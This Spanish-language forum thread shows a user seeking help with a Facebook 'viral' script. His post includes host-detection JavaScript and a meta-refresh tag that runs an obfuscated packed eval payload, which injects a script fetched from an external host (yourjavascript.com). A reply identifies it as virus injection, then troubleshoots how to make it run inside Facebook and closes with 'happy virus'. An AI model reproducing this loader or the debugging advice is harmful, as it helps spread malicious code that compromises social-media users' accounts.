Error de script...

• Autor Autor eduu
  • Fecha de inicio Fecha de inicio
E

eduu

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Buenas tengo un problema...... me sale este mensaje.. cuando intento redireccionar un codigo javascript..automaticamente....

Aqui les dejo el comienzo del javascript

HTML:
if (document['location']['host'] != 'www.facebook.com' || !Env['user']) {
    alert('Lo sentimos, este script solo funciona en FACEBOOK.com ');
};
if (document['location']['host'] == 'www.facebook.com' || !Env['user']) {
    alert('Espere porfavor, sera redirigido automaticamente al video.');
};

y aqui le adjunto la foto .. a ver quien me puede ayudar..

la redireccion con este codigo...

HTML:
<meta http-equiv="refresh" content="2;URL=javascript: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4:(a=(b=8).3(\'1\')).5=\'6://7.2/9/1.c?\'+d.e(),b.f.g(a);h(0)',18,18,'|script|com|createElement|javascript|src|http|yourjavascript|document|24126829101|||js|Math|random|body|appendChild|void'.split('|'),0,{})); ">

Última edición:
El primer código es el que muestra la alerta, así que no entiendo cual es tu problema.

mira es que el codigo en si.. deberia pegarse en fb en la url.... y sale una imagen editada.. pero si yo la quiero redireccionar no me funciona....

1- es un script viral de facebook
2- por mas que encriptes el codigo jsbeautifier.org lo saca!
3- no estas redireccionando sino que estas inyectando codigo en el facebook.
4- el problema no esta en la redireccion, sino en la deteccion de si estas dentro de facebook.com o no. Aparte estando o no dentro de facebook siempre el script se ejecuta completo y da error si no es en facebook. Porque las funciones que llamas para inyectar el virus en facebook, se ejecutan al final del codigo JS... ese if de la deteccion de facebook.com tendria que tener un }else{ y si esta dentro de facebook ejecutar el resto del codigo.
Para ver que te regresa document['location']['host'] solo coloca en la primera linea: alert(document['location']['host'] );
Y ve si estas en facebook o no! (Pero te voy diciendo que no, porque el codigo se ejecuta en un iframe, no en facebook. asique no podras inyectar el codigo en facebook. Proque estas dentro de un iframe y no podes manejar el contenedor, que es facebook, podes saber si el contenedor es faceobok con top.location.href, pero el codigo lo estas tratando de inyectar dentro del iframe no fuera!

Saludos y happy virus!